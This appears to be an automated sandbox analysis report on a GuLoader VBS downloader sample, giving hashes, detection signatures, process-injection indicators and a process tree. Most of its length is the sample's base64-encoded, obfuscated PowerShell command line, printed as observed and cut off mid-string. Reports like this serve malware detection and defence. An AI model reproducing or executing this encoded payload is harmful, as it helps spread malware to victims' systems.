guloader | 3fd4674bc6364b35a1e0e144a04f3cdf671c5097cc5a7ff8cf0a7fa742773024

General

Target

195727592-042128-sanlccjavap0004-4150.vbs
Size

158KB
MD5

07dafb8da97b43009011125fd489c82e
SHA1

b95ad8ea65e871bd266b36764ccd653862c34696
SHA256

3fd4674bc6364b35a1e0e144a04f3cdf671c5097cc5a7ff8cf0a7fa742773024
SHA512

cfb4d330bccea58faa568e41a9a1f739e3f35786219b28f10b4a05a6722230047887ab17dfa5b7e86522ea74cc4882ca0623aa42d3ebc2db7084bd48d25f5272
SSDEEP

3072:05klbn2QX0ylHN8MZNpTsFREkhbK2+JuNOZ8Gk:/j2u0xkMGklK2yuNv

Score

10^/10

guloader downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2024	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2024	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1088 wrote to memory of 2024	1088	WScript.exe	26
PID 1088 wrote to memory of 2024	1088	WScript.exe	26
PID 1088 wrote to memory of 2024	1088	WScript.exe	26
PID 1088 wrote to memory of 2024	1088	WScript.exe	26
PID 2024 wrote to memory of 948	2024	powershell.exe	28
PID 2024 wrote to memory of 948	2024	powershell.exe	28
PID 2024 wrote to memory of 948	2024	powershell.exe	28
PID 2024 wrote to memory of 948	2024	powershell.exe	28
PID 948 wrote to memory of 1816	948	csc.exe	29
PID 948 wrote to memory of 1816	948	csc.exe	29
PID 948 wrote to memory of 1816	948	csc.exe	29
PID 948 wrote to memory of 1816	948	csc.exe	29

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\195727592-042128-sanlccjavap0004-4150.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1088
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "JABGAGkAcgBlAGYAaQAgAD0AIABAACcADQAKAEUAcgBsAGEAcwBBAEMAYQBzAHQAcgBkAFMAZQBuAHQAcgBkAFMAcABoAHkAZwAtAE8AdABlAHMAYwBUAE0AYQB0AHIAaQB5AFoAbwBhAGMAdQBwAEQAcgBpAGYAdABlAFMAZgBpAG4AawAgAG4AaQB0AHIAYQAtAEYAcgBlAG0AawBUAFMAZQBtAGkAcgB5AFcAYQBzAHAAaQBwAFMAagBsAGUAcwBlAHIAbgB0AGcAZQBEAE4AeQBzAHQAYQBlAEQAZQBsAGkAYwBmAEMAZQByAGUAbQBpAEMAbABpAHMAZQBuAEEAbQBiAG8AaABpAFAAcgBlAGMAbwB0AFMAawBqAGEAbABpAFMAbAB1AGsAawBvAEIAeQBnAGcAZQBuAEsAbwB1AHAAcgAgAEIAbwB4AGkAbgBAAEUAcwBwAGEAcgAiAAoATQBkAGUAYQBmAHUAUwB0AHUAZABzAHMAQwBhAHQAaABvAGkARwBlAG4AcgBlAG4AVQBuAG4AZQByAGcAUwBwAGEAdABpACAARgBvAHIAdgByAFMAUABsAGEAdABhAHkAQgBpAGEAdQByAHMAUwB2AGIAZQBzAHQAUwBjAHUAdAB0AGUATQBhAGEAZABlAG0AQQBuAG4AdQBsADsACgBGAHIAZQBjAGsAdQBKAG8AdQByAG4AcwBVAGQAZwBhAG4AaQBHAGEAYQBiAGUAbgBEAGUAbgB0AGEAZwBVAGQAdQBlAGwAIABCAGwAbwBtAHMAUwBFAHgAcwBjAGkAeQBzAHQAYQBsAGsAcwBSAGUAcABsAGkAdABOAGUAZABqAHUAZQBTAHUAbAB0AGEAbQBUAHUAYgB1AGwALgBnAGUAbgBlAHIAUgBTAHkAbgBzAGUAdQBNAGkAYQBvAHcAbgBUAGkAbABzAHQAdABJAG0AcAByAGkAaQBNAGEAcgB2AGUAbQBLAGwAYQBzAHMAZQBHAG8AbwBzAGUALgBVAG4AaQBtAGkASQBNAGkAYwBoAGkAbgBBAGwAYQByAG0AdABCAGEAZwBlAHIAZQBTAG8AbQBuAGkAcgBmAGEAcgB0AGoAbwBVAGQAbAB5AGQAcABDAGgAYQB0AHMAUwBTAHUAcABlAHIAZQBFAHQAaABlAHIAcgBTAGsAcgBhAGEAdgBMAGkAZABrAGIAaQBwAGUAbgBzAGwAYwBWAGEAcgBtAGUAZQBEAGkAYwBlAGwAcwBCAGwAcwBlAHIAOwAKAFUAZABmAHIAZABwAFcAaABpAHIAbAB1AFUAbgByAGUAYQBiAEYAYQByAHYAZQBsAFMAdQBwAGUAcgBpAFIAZQBtAGUAbgBjAEYAbwBsAGsAZQAgAEEAcwBjAGUAbgBzAEIAdwBhAG4AYQB0AFMAaABhAGgAegBhAE8AdgBlAHIAcAB0AFMAcAByAGcAZQBpAEoAdgBuAGUAZABjAEEAZABzAHQAcgAgAEYAbgBnAHMAbABjAEEAeABpAGwAbABsAEUAcABpAGsAZQBhAFMAdABvAHIAbQBzAHMAawBhAGEAbgBzAEYAdQBuAGsAdAAgAEEAZgBtAGEAZwBJAEkAbQBtAGUAZABuAEwAbwBrAG8AbQB0AEEAZwBnAHIAZQBlAEsAbABhAHYAZQByAEYAbwByAG0AYgBuAEwAaQBuAGEAaAAxAAoAVABvAGQAZAB5AHsAVAB1AHMAYwBoAFsAQgBhAHYAbgBlAEQATwBmAHIAZQByAGwAUgBlAGYAbABvAGwARABlAHAAaAB5AEkAUABzAGUAdQBkAG0AZwByAHUAbQBiAHAAQwBvAG4AZwBlAG8AQgBlAG4AZABpAHIAbABpAG4AaQBlAHQASQBuAGQAZQBrACgARABpAHMAcwBpACIAQQBuAHQAaQBjAHcAVABpAGwAcwB0AGkAWgBlAGMAYwBoAG4ATABpAG4AZABlAG0AQQBiAHMAbwByAG0ASwBpAG4AbwBvAC4AUwBvAGMAbwB0AGQASQBsAGwAdQBzAGwAZwBhAGwAbABzAGwASQBtAG0AZQB0ACIAVQBuAGcAZABvACkAUwBwAHIAZwBlAF0AYwBvAGIAbwBsAHAATwBpAGwAYgBpAHUAUwB0AHIAaQBnAGIAcwB3AGkAZgB0AGwAUgBhAGYAcgBhAGkAZgBvAHIAZQBiAGMAUwBhAGwAcwBpACAASABvAGwAbwBnAHMAVQBuAGkAZgBvAHQAQwBsAGUAYQByAGEARwBlAG4AbwBwAHQASQBuAHQAZQByAGkAUwBpAGwAaQBjAGMAUABvAG4AZABlACAARwBhAHIAZABlAGUAVQBkAGQAZQBsAHgAUwBtAG8AdgBzAHQATQBlAG0AYgByAGUAQQBuAGsAbABhAHIATABhAHMAawBlAG4AbABvAG0AbQBlACAAQwBhAHIAbgBpAGkARwBlAHIAbgBpAG4AVQBuAGQAZQByAHQARABvAHQAZQByACAATABuAGYAbwByAG0AUgBvAGUAawB1AGkAVwBvAG0AYQBuAHgAVgBlAGwAcwBpAGUAVgBpAGwAbABpAHIAVQBuAGkAbgBnAE0ARgBvAHIAYQByAGUAVQBuAHIAZQBhAHMAUwB1AGMAYwBlAHMAVQBuAGQAZQBmAGEATQBhAG4AdQBzAGcARgBvAHIAdAByAGUAUABzAGUAdQBkACgAaQBuAGQAZQBoAGkASQBuAHQAZQByAG4AVQBkAG0AYQBsAHQAUwB0AG4AawBwACAARABlAHAAZQB0AEYASwByAGkAZwBzAGEAcwBhAGcAcgBlAGcARgBhAGwAcwB0AHAAUABlAHIAYQBtAG8AUAByAGUAawBuAGwAQQBuAHQAcgBvACwATQBhAHMAcwBlAGkAQgBsAG8AbQBzAG4AQQBjAGMAdQBzAHQAUwBoAG8AdABtACAAcAByAGUAZgByAFUASwBhAG4AbwBuAGQAUwBwAGwAaQB0AHMAYQBhAGcAZQByAGsAaQBuAHQAZQByACwASABpAG4AawBlAGkAUwB1AG0AbQBhAG4ARwB1AGwAZABrAHQAVAByAGEAbgBxACAAQgBlAHIAYgBlAFMAUABpAG4AYQBnAGgAUABlAHIAZQBtAG8ASABpAGUAcgBvAHIAUABpAHEAdQBlAHQAdQBvAHAAcwBsAGUATQBpAHMAZgBvACwAQgBlAHQAbABlAGkARQBmAHQAZQByAG4AUwBoAGUAaQBrAHQARABlAHMAaQBuACAAUwBsAHUAdABuAE0ARwBsAG8AbQBlAGEAQQByAGIAZQBqAHMAVABoAGUAYQB0ADEAVgB1AGcAZwBlADUATgBhAHQAdABlADMARgBnAHMAaQB0ACkARgByAGUAbQBsADsACgBSAGUAbABlAGMAWwBPAG0AZABpAHMARABzAHQAdQBlAHAAbABPAHYAZQByAHMAbABNAGkAdAB0AGUASQBTAHQAZQBuAGcAbQBIAGEAbAB2AGYAcABIAHUAawBiAGEAbwBOAG8AbgBkAGUAcgBGAGwAYQBzAGsAdABLAG8AbgB0AHIAKABVAGcAZQBuAG4AIgBBAGYAbABiAHMAawByAGkAcwBpAGsAZQBBAHIAbQBiAHIAcgBTAHUAYgBzAHQAbgBPAHYAZQByAHAAZQBVAGEAdQB0AG8AbABNAGUAbABsAGUAMwBlAHgAcABpAGEAMgBEAG8AYgBiAGUAIgBvAHAAdABhAGcAKQBHAGEAcwB0AHIAXQB2AGkAbABsAG8AcABPAHUAdAB3AGUAdQBMAG4AZwBlAHIAYgBEAGEAZwB2AG8AbABDAGEAcgBiAG8AaQBQAHIAbwB0AG8AYwBGAG8AcgBlAHMAIABBAGMAaAB5AGQAcwBFAGsAcwBwAG8AdABNAGEAbABlAHIAYQBLAG0AcABlAHIAdABDAG8AdQBuAHQAaQBCAGUAdgBnAGUAYwBPAHUAdAByAGkAIABzAGEAbABnAHMAZQBPAG0AZwBuAGcAeABNAG8AbgBlAHQAdABSAGUAcQB1AG8AZQBBAGQAcgBlAHMAcgBTAGgAaQBuAGIAbgBTAGUAbAB2AGIAIABBAG4AcwB2AGEAaQBFAHMAdABpAHYAbgBBAHIAYwBoAHAAdABBAGIAYQBuAGQAIABSAGEAYwBlAGgAVgBCAGUAYwByAHkAaQBCAGkAdAB0AGUAcgBCAGEAYwB0AGUAdABBAGYAZgBpAG4AdQBQAGEAbgBlAGwAYQBIAGoAZQBzAHQAbABUAGkAbABzAGsAQQBIAGEAZgBuAGkAbABTAHUAYgBnAG8AbABVAGQAYgB1AGwAbwBOAGUAZwByAGkAYwBCAGUAcwBwAGUAKABlAHMAdABpAG0AaQBCAGUAcgB5AGwAbgBBAGMAdABpAG4AdABOAG8AdABpAGMAIABHAGUAbwBmAGEAdgBCAGEAZABlAHYAMQBIAGEAcgBkAGQALABXAGEAcwBoAGEAaQBBAGcAYQBjAGUAbgBCAGoAcgBuAGUAdABDAHkAYwBsAG8AIABTAGsAdQBsAHAAdgBVAHMAbABpAG4AMgBQAHUAbgBjAGgALABFAHAAaQB0AG8AaQBDAGgAbwBrAG8AbgBSAGUAZwBpAHMAdABFAG4AZQByAGcAIABHAHIAdQBuAGQAdgBMAGQAcwB0AGUAMwBJAG4AZABzAGsALABOAHMAdABiAGUAaQBTAHQAYQBuAGcAbgBLAGkAYgBiAHUAdABHAGUAbgBwAGEAIABBAHIAaQB0AGgAdgBHAG8AdAB0AGgANABPAHYAZQByAHMAKQBUAG8AcABrAG8AOwAKAE0AdQBsAHQAaQBbAE0AZQBkAGIAeQBEAFQAbwB1AHIAbgBsAHYAYQByAGkAZQBsAEIAbwBhAHMAdABJAEgAaQBnAGgAdABtAEwAYQBuAGkAZQBwAFQAaQBsAGwAYQBvAEkAbgBkAGkAZgByAFQAZQBkAGEAYgB0AFMAZQBtAGkAcgAoAEkAZABpAG8AbQAiAEMAbwBvAGwAZQBnAEgAZQBuAG4AYQBkAEEAZQBzAHQAaABpAFMAaQBsAGQAZQAzAEEAbABpAG0AZQAyAFAAZQByAGkAbAAiAFMAdAByAGEAdAApAEMAbwB1AG4AdABdAGkAbgB0AG8AeABwAEkAbgB0AGUAcgB1AEUAbQBiAGwAYQBiAHAAcgBvAGwAZQBsAEQAZQBjAHIAZQBpAEQAZQBuAGkAZQBjAFMAbAB1AHMAZQAgAEYAYQBjAGUAdABzAEMAaABhAHIAYQB0AGkAbgBnAGUAbgBhAEcAbABhAHQAcgB0AEQAaQBzAGkAbABpAFIAZQBiAHIAbwBjAEYAbwByAHMAbAAgAFMAdAByAHUAZQBlAFYAZwBnAGUAbgB4AEsAbwBtAHAAbwB0AEUAZgB0AGUAcgBlAEIAbABhAG4AawByAFIAZQBrAHUAcgBuAE0AbwBuAG8AZgAgAEEAdABoAGUAbgBpAEIAbwByAGQAcwBuAFUAbgBzAGEAdgB0AFUAbgBpAHYAZQAgAGEAbQBiAGEAcwBTAFMAaQBnAGkAbAB0AFMAdABpAGwAYgByAFMAaQBjAGsAbABlAEQAbwBsAG0AZQB0AEMAaABlAG0AbwBjAFcAaQBzAHQAZgBoAFMAbwBsAGkAcwBEAFAAZQBuAGcAZQBJAFQAdQBuAG4AZQBCAEEAYgByAGEAegBpAEcAZQBtAHkAdAB0AEgAdQBkAGYAbABzAFAAcgBvAGsAbAAoAGEAcgBnAGkAbABpAFIAaABhAGIAZABuAGIAYQBjAGsAZgB0AFMAaQBmAGYAbAAgAEQAYQBnAHMAcgBNAFMAYwB1AGwAcABpAFMAaABpAGUAbABuAFQAbwBsAGsAZQAsAEgAeQBwAG8AYwBpAEgAbwB2AGUAZABuAE4AeQBuAGEAegB0AFYAaQB2AGkAZgAgAFAAZQBqAGwAZQBIAEQAbwBtAHMAYQBhAHMAbwB1AHMAYQBhAE0AYQBzAGsAYQBuAFMAbABiAGEAcgBkAEcAcgBlAGwAbwBrAEMAaABhAGYAZgAsAFUAZAByAGEAYQBpAEwAYQBiAGkAbABuAFUAbgBiAGUAdwB0AFIAaABiAHAAaAAgAEEAbgB0AGkAcwBIAEIAaQBsAGwAZQB1AHAAbAB1AHIAaQBzAFMAbwB0AGUAcgBnAFIAdQBzAHMAZQBlAFMAZQBuAG4AZQByAFMAbwB1AHIAYwAsAEUAeABwAGUAZABpAFQAaQBsAHMAdABuAFUAbgBkAGUAcgB0AFUAbgBnAGsAYQAgAFUAbgBzAGgAaQBEAGEAZABlAG4AeQBlAEIAYQB0AGMAaABhAEwAbwBjAGsAbwBkAEoAZQBuAHMAawAsAHMAYQBuAHQAYQBpAEwAZQB0AHQAZQBuAHAAbwBsAGkAdAB0AEgAdgBpAHMAcAAgAE0AZQBhAG4AZABIAE8AdgBlAHIAaQBvAFUAbgBzAHUAYgBjAFUAbgBuAGUAZwBrAFMAZQBtAGkAbgBzAFQAdgBhAG4AZwBoAFMAcAByAGkAdAAsAEwAaQBtAGIAbwBpAFYAZQBnAGkAZQBuAFMAawBhAG0AcwB0AEgAbwBnAGUAbgAgAEcAbwByAHMAZQBFAFIAZQB0AHQAZQBrAFAAcgBlAGkAbgBzAEcAdQByAGsAbABwAEgAZQBtAGUAaQBvAEkAbgB0AGUAcgAsAEwAYQBkAHkAZQBpAFMAdABhAHIAdABuAEkAbgBiAG8AYQB0AEMAaABhAHIAdAAgAHMAdAByAGEAYQBNAEYAcgBlAG0AcwBhAFQAcgBhAG4AcwB0AE0AZQBwAG0AaQByAFQAYQBpAGEAcwBvAEYAYQBiAGwAZQAsAFAAdQBzAHMAaQBpAFUAYgBsAGEAbgBuAG4AZQBkAHQAcgB0AEQAeQByAGUAdAAgAE8AcABzAHQAdgBMAEkAbgBkAGwAYgBuAEEAbgB0AGkAcABlAFAAcgBhAGsAawBzAEYAcgBlAGUAdwAsAEcAeQB0AHQAYQBpAFMAcgBnAGUAZgBuAFYAZQBkAGUAcgB0AFQAYQByAG4AaQAgAEgAcgByAGUAbgBCAEYAbwByAHMAdABhAFIAZQBvAHIAZwBhAFQAcwB3AGEAbgBrAEEAbgBhAHQAaABlAEYAbwBrAGsAZQAsAFkAcABwAGkAZwBpAFcAYQB4AHcAaQBuAGYAbAB5AGcAdAB0AEYAbwByAHMAdAAgAE4AbwBuAGYAYQBQAFMAdABpAG4AdQBhAE8AbgB5AGMAaABkAEwAaQBuAGkAZQBkAE0AYQBsAGwAZQB5AEEAcABvAHAAaAAsAFUAbgBwAHUAbgBpAEgAZQBpAGQAZQBuAEUAagBlAHIAdAB0AEgAbwB2AGUAZAAgAEwAYQBtAG0AZQBQAEEAZwBsAG8AYgBhAFMAaQBrAGsAZQByAFYAZQBrAHMAZQB0AFoAZQB1AGcAbQAsAEMAYQBsAGEAbgBpAFYAaQBjAGUAZABuAEwAZQBkAGUAbAB0AEwAcwBlAGIAbwAgAFAAaABpAGwAbwBXAEMAbwBpAG4AcwBoAFYAYQBlAHIAawBpAEwAZQBtAHAAZQB6AFYAaQB2AGkAZgBiAEYAcgBvAG4AdABhAFMAawBpAG4AaAAsAEsAbwBuAHQAbwBpAGQAZQBsAHMAdABuAEMAdQBzAGgAaQB0AFMAawBvAGwAYQAgAEgAYQBpAHIAYgBBAEIAagBlAHIAZwBzAEkAcwBiAHIAeQB0AFQAYQBtAGkAbABvAEEAdQB0AG8AdAApAFUAbgBsAG8AYwA7AAoAQwBpAHYAaQBsAFsAQwByAGUAdgBhAEQARQB4AGMAZQByAGwASABlAGoAcwBlAGwAUwBrAGkAZABlAEkAUAByAG8AZAB1AG0ATgBvAG4AcgBlAHAASwBvAG0AbQB1AG8AUgBhAGQAaQBrAHIARwBhAHIAbgBpAHQATwBwAHQAagBlACgAVQBuAG0AdQBsACIAVQBkAHMAbwBuAGcAYQBkAGoAdQBkAGQAQgB5AGcAZwBlAGkASABvAG0AZQBvADMAUwBlAG0AaQBwADIAVQB0AGkAbABzACIAVQBuAGUAeABwACkARgBlAGoAZABlAF0AQQBmAHQAZQBuAHAAQwBoAGkAZwBuAHUAQQB4AGkAbwBtAGIAVQByAHQAaQBkAGwATwB4AGEAbgBpAGkAUABzAHkAYwBoAGMATAB1AG0AaQBuACAARABlAGEAdABoAHMARQBuAGcAZQBsAHQAQQBuAGEAcgBrAGEAQQBzAGsAaQBsAHQAQQBzAHMAZQBuAGkAVQBsAHQAcgBvAGMAVQBkAG0AYQBnACAATABvAGEAZABpAGUAQgBhAGMAYwBhAHgAQwB1AG4AagBlAHQATQBvAGQAZQBzAGUAUABsAHUAawBuAHIAUwB0AGUAbQBtAG4AVABhAGwAdQBjACAATwBuAGQAZQB0AGkASwBsAGUAYgBpAG4ARQBhAHIAdABoAHQAUwBlAHIAdgBpACAAQQBwAGkAbABpAEUAYQBhAGIAbgBlAHgARABpAGQAZABhAHQASwBuAHMAZABpAFMAZgBvAHIAZgBhAGUAUwBoAGEAawBlAGwATwB6AG8AZQBuAGUAQgBpAGgAdQBsAGMATQBlAHQAZQBvAHQASQBkAGUAbgB0AEMAUwBjAHIAdQBtAGwATQBpAG4AaQBhAGkAVAB1AGIAYQBpAHAARgByAHMAdABlAFIAVQBuAHIAZQBsAGcAVABhAHIAcABpAG4ARgBhAGMAdABvACgATwBtAHIAZQBkAGkAUwBrAHIAaQBnAG4ARABhAGwAcABhAHQAQwBvAHMAbQBvACAAVQBuAGQAZQByAFIATQBpAGMAcgBvAGUAUAB1AG0AYQBlAHYAUAByAG8AZwBuACwARABpAGEAYwBvAGkARABlAHMAdABhAG4ARgBhAGkAbgBzAHQASgB1AHAAYQB0ACAATQBlAHMAbwByAFMAQwBhAG4AbgBhAHQARgByAHUAbQBwAHIASgBhAHoAegBlAGkASgBlAG4AZwBlAHAAQgBhAG4AdABhACwARwByAGwAaQBnAGkAVAB5AHAAaQBmAG4AUABoAGwAZQBnAHQAbABpAGEAbgBlACAASwBhAGYAdABlAFMARgBhAHIAaQBzAGMAVABhAHgAYQBlAHUATgBhAHYAaQBnAGQAUwBwAGEAZwBlACkAUwBhAGwAdAB2ADsACgBIAGEAcgBwAG8AWwBUAGgAZQByAGUARABBAGYAbAB1AHMAbABUAGUAbABvAGwAbABDAGEAcwB1AGEASQBSAGUAdABvAHIAbQBOAGkAZAB2AGkAcABIAGEAZQBtAG8AbwBTAHAAawBuAGkAcgBQAHIAbwBjAGwAdABTAGsAaQBuAG4AKABUAGkAbABoAHUAIgBWAG8AcgBuAGUAdwBOAGkAZwBoAHQAaQBSAGUAbgB1AG0AbgBBAGYAdgBhAHIAcwBVAGcAZQBzAGsAcABEAGEAZABlAGwAbwBQAGEAbgBnAHUAbwBTAHAAeQB0AG4AbABPAHAAYQBsAG8ALgBXAGkAbgBkAHMAZABQAHIAbwBjAGEAcgBLAGwAYQBzAHMAdgBkAGUAdgBpAG8AIgBNAGIAZQBsAHQAKQBNAGUAbABsAGUAXQBDAHkAdABvAGQAcABCAGUAcwB0AGkAdQBVAG4AZQBxAHUAYgBBAGYAcwB0AG4AbAByAGkAcABlAHMAaQBCAGUAZwBpAHIAYwBIAGUAZABuAGkAIABNAGEAcwBzAGUAcwBEAGUAZgBlAGMAdABUAG8AdQBjAGgAYQBCAGUAagBkAHMAdABQAHMAeQBjAGgAaQBIAHkAZAByAG8AYwBhAHMAcwBvAGMAIABGAGwAYQBnAGUAZQBMAGEAbgBnAGYAeABGAGkAZwB1AHIAdABTAHAAaQByAHIAZQBvAHAAZQByAGEAcgBWAHIAcwB0AGUAbgBVAG4AZgBlAGUAIABGAGEAeABmAHIAaQBNAGkAcwBpAG4AbgBEAHUAYwBhAHQAdABOAG8AbgBmAGEAIABWAGsAcwB0AHIAQQBNAGEAdABpAG4AZABGAG8AcgBrAGwAZABCAHUAcwBzAHkAUABPAHYAZQByAGwAbwBGAHkAcgByAGUAcgBVAG4AZABpAHMAdABDAG8AbgBmAHUAKABMAGUAdgBlAHIAaQBkAGUAbgBpAGMAbgBJAG0AbQBlAG4AdABwAGEAYQBrAHIAIABJAG4AZABiAHIARQBkAGEAcgBuAGUAcwBTAHQAagBlAHIAawBPAHYAZQByAGEAYQBBAGcAYQBzAHQAZABQAGEAbgB0AG8AcgBQAHIAZQBiAGwALABOAG8AbgBjAG8AaQBTAGEAbABnAHMAbgBBAGsAawBsAGEAdABTAHUAbABwAGgAIABEAG8AbQBtAGUASwBTAGwAYQBnAHAAbwBQAHIAaQBtAHUAbgBTAG0AaQBkAGcAdABFAG4AdAB5AGQAcgBIAHkAcwB0AGUAbwBVAG4AcgBlAHMALABMAG8AbQBtAGUAaQBTAHkAbQBwAHQAbgBTAG0AYQBhAHQAdABFAHgAaQBsAGEAIABCAHUAdABlAGIAQwBzAGsAaQBuAGsAaQBMAHMAawB1AHIAcgBQAGEAcwB0AHIAawBLAGEAcwBpAG4AKQBKAGkAYgBiAHkAOwAKAEYAaQByAHMAdABbAFQAbwB0AGEAbABEAFUAcgBlAGQAZQBsAE4AaQB0AHIAbwBsAEgAbwB2AGUAZABJAFAAaQBlAHQAaQBtAE8AcAByAGkAbgBwAHQAYQBuAGEAZwBvAEEAbgBhAGMAYQByAFYAaQBzAG4AZQB0AGQAdQBwAGwAaQAoAFQAYQBsAGUAZAAiAHIAbwBrAGsAZQBrAE8AcABsAG8AZABlAFYAYQBsAGcAYwByAEEAcgBlAGEAbABuAGgAeQBwAGUAcgBlAFMAbQBnAGUAbgBsAEYAdQBsAGQAcwAzAEEAbgB0AGkAcAAyAEEAZwBlAGwAYQAiAFMAdgByAGQAcwApAFQAcgBhAGQAcwBdAEYAbwBhAG0AZgBwAFMAdQBsAHAAaAB1AEYAcgBlAG0AbQBiAFIAdQB0AHMAYwBsAEEAbgBrAGwAYQBpAEMAbwBnAGwAbwBjAEEAbgBhAGwAZQAgAEMAdQBwAHIAbwBzAFMAdABhAGwAZAB0AFIAaQBnAHMAZgBhAGUAbABpAGcAZQB0AEcAcgBvAGUAbgBpAFMAZQBjAHUAcgBjAEIAbABvAGsAbwAgAFQAcgBhAGYAaQBlAEYAcgB1AHQAaQB4AFMAbQB1AGcAZwB0AFMAdABvAGMAYwBlAFUAbgBuAHUAcgByAEsAbwBrAGsAZQBuAEYAbABhAHQAdAAgAEIAdQBzAGcAYQBpAFQAZQBnAG4AZQBuAFIAbwBtAGEAbgB0AEIAYQBjAGsAcwAgAFUAbQBiAHIAYQBJAEIAZQBsAGkAbgBzAG4AbwBuAHAAaQBWAEgAbwBtAG8AegBhAFUAbgBtAGEAbABsAEgAagBnAGEAYQBpAFQAcgBhAG4AcwBkAFAAcgBlAGQAZQBMAEcAcgBhAGYAaQBvAFQAcgBpAHYAaQBjAEsAbwBuAGQAZQBhAEYAZQBlAGwAeQBsAEIAZQBzAGwAdQBlAEIAYQBzAHQAaAAoAFAAYQBsAG0AZQBpAGMAYQByAG4AYQBuAEgAagBlAG0AbAB0AEkAbgBkAHUAcwAgAEMAZQByAHQAaQBSAE0AbABrAGUAdgBlAFIAZQBzAHQAcgB2AE0AaQBjAHIAbwBpAFAAbgBlAHUAbQBiAEEAbgB0AGkAcwAsAEQAZQBrAG8AbABpAGQAeQBrAHMAdgBuAEkAbgB2AGkAdAB0AE0AdgByAGUAawAgAEIAZQBiAHIAZQBTAEIAaQBzAHQAdABlAFQAcgBvAG0AbQB0AFMAaQBuAGQAZQBwAEYAcgBlAG0AbQBmAEYAeQBzAGkAbwAxAEEAbgBsAG8AZwAxAE0AZQB0AGUAcgA5AFUAbABvAGIAbwApAGYAcgB5AHMAZQA7AAoAUgB1AG4AZABlAFsAUABhAHIAdABpAEQAUwBrAGkAbgBuAGwARQBsAGYAZQBuAGwARQByAGgAdgBlAEkAQQBmAHQAZQByAG0AQQBkAHYAbwBrAHAAUwBqAGkAcABuAG8ARgBhAGIAdQBsAHIAVQBwAGEAYQBhAHQARABpAHMAcABlACgAUwBwAGwAaQB0ACIATQB5AGUAbABpAEEAQgBsAGkAbgBrAEQAVABvAG0AYgBvAFYAQwBhAHMAZQBtAEEAUwBrAGkAbgBkAFAAQgByAGEAZAB5AEkAQQB1AHQAbwBhADMAawBvAG4AZgBpADIAQQB1AHQAbwBtAC4ATABpAGIAZQByAEQAUAByAG8AZgBlAEwAVQBuAHMAdABhAEwAUgB1AHMAawBpACIAUABhAGEAdABlACkAQwBhAG4AbgBvAF0AUwB0AGkAcABlAHAAVQBuAGQAZQByAHUARgBvAHIAZAByAGIAVAByAGkAbABsAGwASABhAGkAcgBzAGkAQgBlAHMAawBmAGMATABpAGcAZwBlACAAUgBpAG0AYQB0AHMASABhAG4AcwBpAHQASABhAHUAdABlAGEAeQBlAG4AaQBzAHQAUgBlAHQAcgBvAGkAQwBsAGEAcgBlAGMAWQBuAGQAZQByACAAVwByAGkAcwB0AGUATwB0AG8AbQB1AHgARABvAHIAeQBlAHQAYwBvAHUAbgB0AGUAQgByAG8AbgBjAHIAUgBlAHYAaQBzAG4ARgBvAG4AZABzACAARABhAG0AcABpAHYAQwByAHkAcAB0AG8ASwBsAGEAZABkAGkAUgB1AHMAdABpAGQAUwBtAGQAZQBzACAARwBpAG4AYQBzAEYAQQBmAGgAYQBuAHIAdQBwAGwAbwBhAGUAUABsAGEAaQBuAGUAdABlAG4AcwBpAFMAQwBpAHIAYwB1AGkAUABhAHIAYQBuAGQAYgBhAG4AawBiACgAYgByAGEAbgBkAGkATQBvAG4AYQBjAG4AUwB0AGEAYQBsAHQASwBhAHIAdABvACAAQQBwAHAAYQBsAFgARwBsAG8AbQBlAGUATgB5AGwAbwBuAHIAUgBlAHYAZQByAG8AUAByAGkAbgB0AG4AVgBvAGcAbgBsAGkAZgBuAHQAdQBiACkAVABlAG0AZQByADsACgBJAG0AcABhAHIAWwBGAHIAZQB1AGQARABWAGkAcgBpAGwAbABuAG8AbgBvAHIAbABXAHIAaQBjAGsASQBCAGkAdAB0AGUAbQBIAGEAZgB0AGEAcABKAGUAcABwAGUAbwBJAGQAeQBsAGwAcgBCAHUAbgBjAGgAdABFAHIAaQBnAGkAKABTAGsAaQBiAHMAIgBHAGwAYQByAGUAawBTAHQAYQB1AG0AZQBFAHgAdQBkAGEAcgBiAGwAdQBiAGIAbgBDAG8AaQBuAGQAZQBIAG8AbwBrAG0AbABBAG4AaABlAG0AMwBKAGUAawBhAHQAMgBJAG4AdABlAHIAIgBBAG4AZwByAGUAKQBCAGUAZwB5AG4AXQBqAG8AaQBuAGUAcABLAGUAbgB0AGYAdQBHAGUAbwBmAHkAYgBQAGgAbwB0AG8AbABQAG8AbAB5AHAAaQBNAGEAcgBrAGgAYwBUAHIAbwBnAGwAIABOAG8AbgBlAHAAcwBUAGUAaQBuAG8AdABVAG4AZgBhAHQAYQBLAG8AbQBtAGEAdABaAGkAYgBlAHQAaQBGAHIAYQBnAG0AYwBUAGEAbABlAG0AIABzAGwAdgByAHYAZQBUAGUAawBuAG8AeABTAG4AZQBkAHIAdABQAGgAYQBuAHQAZQBQAG8AbABhAHIAcgBEAGoAaQBiAG8AbgBCAGwAdQBzAGgAIABEAGUAZAB1AGMASQBLAGUAbABzAGUAbgBFAG0AbwB0AGkAdABBAHQAdABlAHMAUABCAGoAZQByAGcAdABCAGwAaQBuAGQAcgBDAGgAZQBtAGkAIABTAGUAZQBpAG4ARQBLAHYAYQBuAHQAbgBGAG8AcgBmAHIAdQBvAG4AZAB1AGwAbQBVAHYAdQByAGQAUwBNAGEAbgBnAGUAeQBOAG8AbgB5AGwAcwBHAHIAZQBjAGkAdABLAGwAbwBhAGsAZQBGAG8AcgBtAGEAbQBTAGsAYQB0AHQATABJAG4AZABpAGMAbwBNAGEAawBhAGIAYwBTAHQAdQBlAG8AYQBTAHAAZQBjAGkAbABTAHYAcgB0AGUAZQBUAHIAbABhAGcAcwBGAHIAYQB0AGEAQQBTAGsAbwBoAG8AKABCAGkAZABkAGEAdQBEAGkAcwB0AHIAaQBEAGkAYgByAGEAbgBQAGwAYQB0AGkAdABQAGUAbgB0AGEAIAB